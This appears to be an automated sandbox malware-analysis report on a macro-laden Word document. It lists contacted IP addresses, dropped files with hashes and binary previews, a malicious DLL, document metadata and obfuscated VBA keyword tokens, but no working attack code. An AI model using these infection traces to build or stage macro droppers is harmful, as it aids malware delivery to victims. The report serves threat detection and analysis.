                                                                    • 104.21.88.166
                                                                    • 212.227.200.73
                                                                    • 192.0.78.20
                                                                    Info-237-602317.docGet hashmaliciousBrowse
                                                                    • 104.21.88.166
                                                                    • 212.227.200.73
                                                                    • 192.0.78.20
                                                                    Info-237-602317.docGet hashmaliciousBrowse
                                                                    • 104.21.88.166
                                                                    • 212.227.200.73
                                                                    • 192.0.78.20
                                                                    8776139.docmGet hashmaliciousBrowse
                                                                    • 104.21.88.166
                                                                    • 212.227.200.73
                                                                    • 192.0.78.20
                                                                    8776139.docmGet hashmaliciousBrowse
                                                                    • 104.21.88.166
                                                                    • 212.227.200.73
                                                                    • 192.0.78.20
                                                                    2021_20_01_31624.docGet hashmaliciousBrowse
                                                                    • 104.21.88.166
                                                                    • 212.227.200.73
                                                                    • 192.0.78.20

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                    Category:dropped
                                                                    Size (bytes):58936
                                                                    Entropy (8bit):7.994797855729196
                                                                    Encrypted:true
                                                                    SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                    MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                    SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                    SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                    SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                    Malicious:false
                                                                    Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):326
                                                                    Entropy (8bit):3.1059794776750005
                                                                    Encrypted:false
                                                                    SSDEEP:6:kKXfwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:P0kPlE99SNxAhUegeT2
                                                                    MD5:AF3E40C6143B7C1580CABC4D833264A5
                                                                    SHA1:C530EF975CA825312D025A674A655B101C7577CF
                                                                    SHA-256:9E85079D9122E2D0EFBF1A9EC220C04052100EE4033309FB960A729A2B1D7A54
                                                                    SHA-512:8CF7932992F0EC435DAEFB9A51C256DFA179308B6D8E988DB2BB96E5510BF999AB197833EB4CCF1460C504B8220417CB22F207352A35A89D8125711C4EB0E52A
                                                                    Malicious:false
                                                                    Preview: p...... ........l..+....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D521D9E8-B04E-4308-BA86-6463BC7125FE}.tmp
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1536
                                                                    Entropy (8bit):1.3568273340340575
                                                                    Encrypted:false
                                                                    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbG:IiiiiiiiiifdLloZQc8++lsJe1MzC8/
                                                                    MD5:DEA88B2A7555DC902827FB65966666D2
                                                                    SHA1:EDBA915F1F013DCE52DA61F26806544F7868C5AB
                                                                    SHA-256:72611C20007C7998A1C1518DD9E1348B20159C4073B10817D14E386BEC583186
                                                                    SHA-512:839BB55E4FDA7AF156C768399D7E5A126C14F2204CFF36C78E014ABFF34858755D0B0B1A0BD50A2C3456132FBE8BBBB6914B3F8E14EEB1DB882DDFCB884EE6D6
                                                                    Malicious:false
                                                                    Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5018462-B174-499E-B3BD-E7523F18DF93}.tmp
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1024
                                                                    Entropy (8bit):0.05390218305374581
                                                                    Encrypted:false
                                                                    SSDEEP:3:ol3lYdn:4Wn
                                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                    Malicious:false
                                                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\CabF6EE.tmp
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                    Category:dropped
                                                                    Size (bytes):58936
                                                                    Entropy (8bit):7.994797855729196
                                                                    Encrypted:true
                                                                    SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                    MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                    SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                    SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                    SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                    Malicious:false
                                                                    Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                    C:\Users\user\AppData\Local\Temp\TarF6EF.tmp
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):152533
                                                                    Entropy (8bit):6.31602258454967
                                                                    Encrypted:false
                                                                    SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                    MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                    SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                    SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                    SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                    Malicious:false
                                                                    Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\N00048481397007.LNK
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:11 2020, mtime=Wed Aug 26 14:08:11 2020, atime=Tue Jan 26 13:54:32 2021, length=143360, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2078
                                                                    Entropy (8bit):4.499545182329711
                                                                    Encrypted:false
                                                                    SSDEEP:48:83n/XT+NnBJqCRMQh23n/XT+NnBJqCRMQ/:8X/X6NnBUCRMQh2X/X6NnBUCRMQ/
                                                                    MD5:4DC93C5BDC369B881D1F1C1B5D773F3D
                                                                    SHA1:9685FCA992A27B86432271969DCA9B566A7E22FA
                                                                    SHA-256:5EDA56B24F00F7C7DD8468CCE528CB31956225F9508748AF60D74C02DFA44E0E
                                                                    SHA-512:638E9A052AB71E9E7B1622EF05F3210EEDC13253D8228BD900087BC37EE72F1F3E288390C69E5E11C3BE2B5FA50B3BA4396AA1FFC81E9956C27FB69DF2033CF8
                                                                    Malicious:false
                                                                    Preview: L..................F.... ......{.....{....'.....0...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2..0..:R.v .N00048~1.DOC..T.......Q.y.Q.y*...8.....................N.0.0.0.4.8.4.8.1.3.9.7.0.0.7...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop\N00048481397007.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.0.0.0.4.8.4.8.1.3.9.7.0.0.7...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......494126..........D_....3N...W...9F.C.........
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):83
                                                                    Entropy (8bit):3.9220124011386437
                                                                    Encrypted:false
                                                                    SSDEEP:3:M1BMWcmGUz/uWcmGUmX1BMWcmGUv:MAumEg
                                                                    MD5:9177EA48FE0784FEE174EA5A993CB67D
                                                                    SHA1:E16A37EFB21A72B380AECB88FEDF16CCA6D2D212
                                                                    SHA-256:E2AD03A823781A81F8F3BC613947C8F8065A4E4CC4EB08431CE74839F35DEC93
                                                                    SHA-512:7CBCB55B15FF3CF9C05BF225A7C6291F82F1E7AB0DF3F77DA89A273CC7B2DD98E43A99C727F5D02B8BFD19C786B4072154C92F4AAAD2B74683D357CB25FB974D
                                                                    Malicious:false
                                                                    Preview: [doc]..N00048481397007.LNK=0..N00048481397007.LNK=0..[doc]..N00048481397007.LNK=0..
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):162
                                                                    Entropy (8bit):2.431160061181642
                                                                    Encrypted:false
                                                                    SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                    MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                    SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                    SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                    SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                    Malicious:false
                                                                    Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DXR0C5WZELQL0TY5LBY1.temp
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8016
                                                                    Entropy (8bit):3.5841938963145714
                                                                    Encrypted:false
                                                                    SSDEEP:96:chQCsMqbqvsqvJCwovMz8hQCsMqbqvsEHyqvJCworxMz1PYkHAMf8IxlUVVMIu:cy+ovMz8yWHnorxMz1uMf8IEMIu
                                                                    MD5:FAB5F778AFC277EE927814807F840251
                                                                    SHA1:C899512AF16B005203AA3120262778B57C93BFB4
                                                                    SHA-256:B66203C08906A30BF9D03B449AD542DA8E1A731188C2CDF3DA597359376580AF
                                                                    SHA-512:8CF645A5A445BFDEC39F89A9F0C3C5F0CC97FAE806D5AC300D18787C01517E19076D5066933429161B6DE867FB0B75813C2898A62558E723C86CACF1A5777157
                                                                    Malicious:false
                                                                    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                    C:\Users\user\Desktop\~$0048481397007.doc
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):162
                                                                    Entropy (8bit):2.431160061181642
                                                                    Encrypted:false
                                                                    SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                    MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                    SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                    SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                    SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                    Malicious:false
                                                                    Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                    C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):628447
                                                                    Entropy (8bit):6.912286773857833
                                                                    Encrypted:false
                                                                    SSDEEP:12288:8YzchQVZnkmt/70MWugxPJZFpf0c1pHibdJxUR9rNXZL4:n4KV5Hpt8bZHLGnM919
                                                                    MD5:8E90CD714E2817279BF79A2671612850
                                                                    SHA1:9D9E37927CC21F980624369B73942426D6C75F88
                                                                    SHA-256:F409888E8DD33D184E1499AF1FF09AD95009C3A0CF0D6414403ACDD92455951B
                                                                    SHA-512:1E47E90EA18713F0C641B75A94E14F79CABD6B5C57BB23702A26EE0B05BEC68EA54EC4ECAD7DCCF59AAEF4315D501D2F43FDF354C4D1FE5BEF14356A777174CE
                                                                    Malicious:true
                                                                    Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                                                                    Static File Info

                                                                    General

                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Non sed natus asperiores. Ipsum magnam fuga a atque animi sint laboriosam est aspernatur. Ut cupiditate quia., Author: Gabriel Villaseor, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 08:47:00 2021, Last Saved Time/Date: Mon Jan 25 08:47:00 2021, Number of Pages: 1, Number of Words: 5614, Number of Characters: 32003, Security: 8
                                                                    Entropy (8bit):6.195212513334959
                                                                    TrID:
                                                                    • Microsoft Word document (32009/1) 79.99%
                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                                    File name:N00048481397007.doc
                                                                    File size:142848
                                                                    MD5:ad7db0f946bc5c3bb051cb04f359e6a4
                                                                    SHA1:24d54a6a1c4280b948fb245c97e4823d319eefe1
                                                                    SHA256:4fc6cbe4fae599ca6ab094dc1115909a687754f49a3ff31671ae4fbc7b3296d1
                                                                    SHA512:a4b34893134f12724a7fd951d552cf1c3dc2f2bb488506a3ed5e4a94b687e09881a0fe50e25af4de7f41274e8cba539169cda651c95f0c7f4b55d5aa5de6def4
                                                                    SSDEEP:1536:KNpHZTgQSz4w4K0vOYOcc2bqrQFfDngtWBj:y1gQSU3K0hzqrQFbKWBj
                                                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                    File Icon

                                                                    Icon Hash:e4eea2aaa4b4b4a4

                                                                    Static OLE Info

                                                                    General

                                                                    Document Type:OLE
                                                                    Number of OLE Files:1

                                                                    OLE File "N00048481397007.doc"

                                                                    Indicators

                                                                    Has Summary Info:True
                                                                    Application Name:Microsoft Office Word
                                                                    Encrypted Document:False
                                                                    Contains Word Document Stream:True
                                                                    Contains Workbook/Book Stream:False
                                                                    Contains PowerPoint Document Stream:False
                                                                    Contains Visio Document Stream:False
                                                                    Contains ObjectPool Stream:
                                                                    Flash Objects Count:
                                                                    Contains VBA Macros:True

                                                                    Summary

                                                                    Code Page:1252
                                                                    Title:Non sed natus asperiores. Ipsum magnam fuga a atque animi sint laboriosam est aspernatur. Ut cupiditate quia.
                                                                    Subject:
                                                                    Author:Gabriel Villaseor
                                                                    Keywords:
                                                                    Comments:
                                                                    Template:
                                                                    Last Saved By:
                                                                    Revion Number:1
                                                                    Total Edit Time:0
                                                                    Create Time:2021-01-25 08:47:00
                                                                    Last Saved Time:2021-01-25 08:47:00
                                                                    Number of Pages:1
                                                                    Number of Words:5614
                                                                    Number of Characters:32003
                                                                    Creating Application:Microsoft Office Word
                                                                    Security:8

                                                                    Document Summary

                                                                    Document Code Page:-535
                                                                    Number of Lines:266
                                                                    Number of Paragraphs:75
                                                                    Thumbnail Scaling Desired:False
                                                                    Company:Velzquez - Rodrquez
                                                                    Contains Dirty Links:False
                                                                    Shared Document:False
                                                                    Changed Hyperlinks:False
                                                                    Application Version:917504

                                                                    Streams with VBA

                                                                    VBA File Name: Gp0t5ucwnkng7fi, Stream Size: 14586
                                                                    General
                                                                    Stream Path:Macros/VBA/Gp0t5ucwnkng7fi
                                                                    VBA File Name:Gp0t5ucwnkng7fi
                                                                    Stream Size:14586
                                                                    Data ASCII:. . . . . . . . . d . . . . . . . . . . . . . . . l . . . . , . . . . . . . . . . < . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 64 10 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 6c 10 00 00 1c 2c 00 00 00 00 00 00 01 00 00 00 3c 11 59 83 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                    VBA Code Keywords

                                                                    Keyword
                                                                    YXgZLBuTI
                                                                    Const
                                                                    LFmsHlGJO
                                                                    xMeNBMA
                                                                    Error
                                                                    huzCVaAnM
                                                                    ybkwIF
                                                                    mFRDA:
                                                                    HzpNhFB)
                                                                    LXmiCH
                                                                    Split(uwcdCFcFJ,
                                                                    ndrons
                                                                    jqLUKf
                                                                    UrnhFG
                                                                    dtPsGEOG
                                                                    nUxeKfi
                                                                    Resume
                                                                    SdueDATuJ
                                                                    buaHCHyIN
                                                                    VlJBAxsF)
                                                                    rlKxF
                                                                    snBUla:
                                                                    ZcbWFy
                                                                    MvCNCxeRC
                                                                    Split(VVDiBADws,
                                                                    uUNTnPDJ:
                                                                    QNBiBDJF)
                                                                    cskzymBH
                                                                    Array((rlKxF),
                                                                    Split(UupSwG,
                                                                    snBUla
                                                                    XDCYoHErU:
                                                                    KJKIF
                                                                    mFRDA
                                                                    QFCSIz
                                                                    mxkikw
                                                                    CtnVB
                                                                    Array((TYMfJE),
                                                                    eRlxboGG
                                                                    "ndpns
                                                                    wbcoCJA
                                                                    pqwm,
                                                                    vMqQFsCmr
                                                                    NxyDdD
                                                                    jmprxcAGG
                                                                    SRadpEcF)
                                                                    Split(AEpDpJGH,
                                                                    ZhuxR
                                                                    QNBiBDJF
                                                                    Array((bTSPCh),
                                                                    aEMwHJJ()
                                                                    xcFaA()
                                                                    UupSwG
                                                                    vmuBOT()
                                                                    PDgjIDCIF
                                                                    wbcoCJA)
                                                                    Range:
                                                                    DReLBGD
                                                                    "*high*,*critic*"
                                                                    Array((mQUInscCB),
                                                                    YYiqHCrBJ
                                                                    bwTdFGH
                                                                    dtPsGEOG:
                                                                    ppqanE)
                                                                    LJgRGnI()
                                                                    rnfVw()
                                                                    VVDiBADws
                                                                    HzpNhFB
                                                                    mjbBYHhbs
                                                                    aEMwHJJ
                                                                    uQDVbE)
                                                                    Split(LYEtDJDB,
                                                                    TYMfJE
                                                                    BZLGJ
                                                                    AeZXCL
                                                                    yqmFHJvF
                                                                    SOBiDVBG
                                                                    FCnAjUBF:
                                                                    rQMlbCDj()
                                                                    PmHbFtBA
                                                                    XxDunFI:
                                                                    Array((uFHXMGsDH),
                                                                    Array((UrnhFG),
                                                                    zgEErH
                                                                    TziQbRH
                                                                    Array((SdueDATuJ),
                                                                    wAZjcaDbE
                                                                    yifdCzUX
                                                                    Nothing
                                                                    Array((vQbVHTJ),
                                                                    Split(buaHCHyIN,
                                                                    FCnAjUBF
                                                                    ppqanE
                                                                    QFCSIz()
                                                                    zPYsAGBC
                                                                    wPuUI
                                                                    Split(TfZstIBWb,
                                                                    Split(TQutDNlhF,
                                                                    FwMLnnSxs
                                                                    gPxXF
                                                                    nmoAspl
                                                                    IUtVX
                                                                    uFHXMGsDH
                                                                    AeZXCL)
                                                                    LJgRGnI
                                                                    yVlwI
                                                                    vmuBOT
                                                                    Split(NxyDdD,
                                                                    nd:wns
                                                                    yVlwI()
                                                                    xdoxB:
                                                                    Array((SOBiDVBG),
                                                                    BBnudDV)
                                                                    kTIuCnPI
                                                                    Split(IcBqyoTE,
                                                                    Array((JNPIBwzJy),
                                                                    bTSPCh
                                                                    ZtlVi
                                                                    DJesE:
                                                                    upIoDlhH
                                                                    AnoeDGEY
                                                                    Array((rwAdJC),
                                                                    GKCGI:
                                                                    ndgmns
                                                                    nQutDRr
                                                                    nmoAspl)
                                                                    GyemVIEQ
                                                                    Array((ZcbWFy),
                                                                    String
                                                                    XfKDE
                                                                    zPYsAGBC:
                                                                    Split(DReLBGD,
                                                                    ndinns
                                                                    DpdIEHHc
                                                                    LYEtDJDB
                                                                    TziQbRH)
                                                                    cCNkM
                                                                    XxDunFI
                                                                    IfvyDH
                                                                    Array((AjzpdH),
                                                                    jEGWECK()
                                                                    Mid(skuwd,
                                                                    Target)
                                                                    jqLUKf()
                                                                    MNzdmO
                                                                    jEGWECK
                                                                    Split(yqmFHJvF,
                                                                    KDRcGw()
                                                                    JNPIBwzJy
                                                                    MtSXGFAwF
                                                                    kTIuCnPI()
                                                                    xcFaA
                                                                    mbdQXnNAJ
                                                                    OQtflfHc
                                                                    XDCYoHErU
                                                                    Split(mbdQXnNAJ,
                                                                    eRlxboGG:
                                                                    cCNkM:
                                                                    ndtns
                                                                    Len(skuwd))
                                                                    uUNTnPDJ
                                                                    Array((upIoDlhH),
                                                                    PmHbFtBA)
                                                                    Array((wPuUI),
                                                                    dmJpUJBT
                                                                    eJIkEagfC
                                                                    AjzpdH
                                                                    jmprxcAGG)
                                                                    OtpOArK
                                                                    VZXgAzj:
                                                                    EZSQT
                                                                    Split(ybkwIF,
                                                                    PDgjIDCIF:
                                                                    ndmns
                                                                    uwcdCFcFJ
                                                                    Attribute
